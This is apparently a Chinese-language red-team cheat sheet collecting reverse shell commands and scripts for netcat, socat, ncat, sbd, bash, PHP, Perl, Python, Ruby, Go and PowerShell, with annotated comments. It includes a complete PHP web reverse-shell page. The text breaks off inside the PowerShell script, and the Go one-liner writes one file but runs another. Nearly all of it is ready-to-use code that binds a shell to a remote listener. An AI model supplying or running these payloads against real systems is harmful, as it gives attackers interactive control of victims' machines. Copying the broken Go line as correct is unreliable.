前言:
建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到。这是整理的一些常见的反向 shell 和特权提升的笔记文档,红队成员必会,内容最全。
反向shell-备忘录:
通常在获得远程代码执行之后,我们希望获得一些交互式访问——而不是发出单个命令获取单个回显,或与 web shell 交互。从实战的意义来讲,反弹 shell 是非常有必要的。以下将从不同的工具出发,分别列出监听端(listen)与连接端(connect)的用法。
nc
listen:
# Listener: wait for an inbound TCP connection on PORT (-n no DNS lookups, -l listen, -v verbose, -p port).
nc -nlvp PORT
connect:
# Connect to IP:PORT and attach /bin/sh to the connection; -e is only available in netcat builds that support it.
nc -e /bin/sh IP PORT
or
# Same idea for builds that expose -c (command run through sh) instead of -e.
nc -c sh IP PORT
# Variant without -e/-c: a named pipe carries nc's received data into an interactive sh,
# and the shell's stdout+stderr (2>&1) is piped back into nc.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
socat
listen:
# Listener: accept a TCP connection on PORT and bridge it to the local stdin/stdout ("-").
socat tcp-listen:PORT -
connect:
# Connect to IP:PORT and run /bin/sh with its stdio tied to the socket (no pty).
socat exec:/bin/sh tcp:IP:PORT
交互式版本
listen:
# Interactive listener: the local tty is switched to raw mode with echo off, so line editing,
# echo and control characters are handled by the remote pty instead of the local terminal.
socat file:`tty`,raw,echo=0 tcp-listen:PORT
connect:
# Connect and run /bin/sh inside a pty: stderr merged into the pty, new session (setsid),
# SIGINT forwarded, and "sane" terminal settings applied.
socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT
ncat
listen:
# TLS listener on PORT; --allow restricts accepted connections to the given IP.
ncat --allow IP -vnl PORT --ssl
connect:
# Connect over TLS to IP:PORT and run /bin/sh on the connection (traffic is encrypted, so
# content inspection on the wire will not see the shell session).
ncat --exec /bin/sh --ssl IP PORT
sbd
listen:
# Listener on PORT (-l listen, -p port).
sbd -lp PORT
connect:
# Connect to HOST:PORT and run /bin/sh on the connection (-e).
sbd -e /bin/sh HOST PORT
加密版本
listen:
# Listener with sbd's built-in encryption enabled (-c on), keyed by the shared phrase (-k).
sbd -l -c on -k ENCRYPTION_PHRASE -p PORT
connect:
# Connect using the same shared phrase; both ends must agree on the key for the session to decrypt.
sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT
bash
TCP
# Bash built-in /dev/tcp/IP/PORT opens a TCP socket; ">&" binds stdout+stderr to it and "0>&1" binds stdin.
# No external binary is involved, so the only artefact is a bash process whose fds 0/1/2 are a socket.
bash -i >& /dev/tcp/IP/PORT 0>&1
or
# Same command wrapped in bash -c, for use when the invoking shell is not bash (the /dev/tcp redirection is bash-only).
bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'
使用 nc 工具的 UDP 协议版本:
listen:
# UDP listener on PORT (-u).
nc -u -lvp PORT
connect:
# UDP counterpart using /dev/udp. Like /dev/tcp this redirection is a bash feature, so "sh" here
# has to resolve to bash for the line to work.
sh -i >& /dev/udp/IP/PORT 0>&1
php
简单的php代码版本:
# Opens a TCP socket to IP:PORT and runs an interactive sh with fds 0/1/2 redirected to fd 3;
# this assumes the socket is inherited by the child as fd 3.
php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
完整的 PHP 脚本,带有指定要连接的 IP 地址和端口的表单:
<?php
// Reverse-shell endpoint driven by a POST form: connects to the IP ("i") and port ("p")
// submitted by the client, spawns an interactive /bin/sh via proc_open() and relays bytes
// between the socket and the shell's stdin/stdout/stderr until either side reaches EOF.
// The destination comes straight from $_POST with no validation.
// Only rejects the request when BOTH fields are empty; a single missing field falls through to fsockopen().
if (empty($_POST['i']) && empty($_POST['p'])) {
echo "IP address and port not specified!";
}
else
{
$ip = $_POST["i"];
$port = $_POST["p"];
// Command string handed to proc_open(); the three leading commands print host/user info before the shell.
$shell = 'uname -a; w; id; /bin/sh -i';
// Maximum bytes moved per fread() in the relay loop.
$chunk_size = 1400;
// Passed by reference to stream_select(); null means the write/except sets are not watched.
$write_a = null;
$error_a = null;
$process = null;
$pipes = null;
$errno = "";
$errstr = "";
// 30-second connect timeout; on failure the error text is echoed and the script exits.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "$errstr ($errno)";
exit(1);
}
// Child fd 0 is a pipe this script writes to; fds 1 and 2 are pipes this script reads from.
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
echo "ERROR: Can't spawn shell";
exit(1);
}
// Non-blocking mode so a read on one stream never stalls the others.
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
// Relay loop: ends when the socket or the shell's stdout is closed.
while(!feof($sock) && !feof($pipes[1])) {
$read_a = array($sock, $pipes[1], $pipes[2]);
// null timeout: block until at least one of the three streams becomes readable.
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// Socket -> shell stdin.
if (in_array($sock, $read_a)) {
$input = fread($sock, $chunk_size);
fwrite($pipes[0], $input);
}
// Shell stdout -> socket.
if (in_array($pipes[1], $read_a)) {
$input = fread($pipes[1], $chunk_size);
fwrite($sock, $input);
}
// Shell stderr -> socket.
if (in_array($pipes[2], $read_a)) {
$input = fread($pipes[2], $chunk_size);
fwrite($sock, $input);
}
}
// Tear down the socket, the three pipes and the child process.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
?>
<!-- Form that posts the destination IP (i) and port (p) back to this same script. -->
<html>
<body>
<form method="post">
<input type="text" name="i" />
<input type="text" name="p" />
<input type="submit" />
</form>
</body>
</html>
Perl
# Perl: creates a TCP socket, connects to IP:PORT, reopens STDIN/STDOUT/STDERR onto the socket
# and then exec's an interactive sh (the perl process is replaced by the shell).
perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python脚本版本:
#!/usr/bin/env python
# Connects a TCP socket to IP:PORT, duplicates it over fds 0/1/2 of this process,
# then runs an interactive /bin/sh which inherits those descriptors.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP", PORT))
# dup2 the socket over stdin (0), stdout (1) and stderr (2).
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# Blocks until the shell exits; its exit status ends up in p.
p=subprocess.call(["/bin/sh","-i"])
或从命令行使用 python -c 执行:
# One-liner form of the script above: same socket/dup2/sh sequence in a single -c argument.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
Ruby
#!/usr/bin/ruby
# Connects to IP:PORT, reopens this process's stdin/stdout/stderr on the socket, then reads
# one command per line and runs it through IO.popen, writing each output line back to the socket.
# Every line is a fresh child process, so shell state (cwd, variables) does not persist between lines.
require 'socket';
c=TCPSocket.new('IP', PORT)
$stdin.reopen(c)
$stdout.reopen(c)
$stderr.reopen(c)
# Blank lines are skipped; any exception from popen is swallowed by the trailing `rescue nil`.
$stdin.each_line{
|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){
|fd| fd.each_line {
|o| c.puts(o.strip) }}) rescue nil }
或作为单行:
# Ruby one-liner: the socket's fd number is spliced into an sh redirection string so that
# /bin/sh -i uses the socket for stdin, stdout and stderr.
ruby -rsocket -e'f=TCPSocket.open("IP", PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Golang
使用源代码创建文件,运行然后删除源文件:
package main;
import"os/exec";
import"net";
// main dials IP:PORT over TCP and runs /bin/sh with stdin, stdout and stderr all set to the
// connection. The error from net.Dial is discarded, as is the result of cmd.Run().
func main() {
c, _ := net.Dial("tcp","IP:PORT");
cmd := exec.Command("/bin/sh");
cmd.Stdin=c;
cmd.Stdout = c;
cmd.Stderr = c;
cmd.Run()
}
保存文件(例如 test.go),然后构建并运行:go run test.go
或者直接在命令行执行:
# Writes the Go source from above to /tmp/rev.go, then runs `go run` on /tmp/test.go and removes
# /tmp/test.go afterwards (the path written and the path run/removed are not the same file).
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/rev.go && go run /tmp/test.go && rm /tmp/test.go
Powershell
$address = 'IP'
$port = 'PORT'
# Closes the TCP client (if still connected) and the spawned process (if it has an exit code),
# then terminates the script. Reads $client and $process from the enclosing script scope.
function cleanup {
if ($client.Connected -eq $true) {
$client.Close()}
if ($process.ExitCode -ne $null) {
$process.Close()}
exit}
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.RedirectStandardError = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.A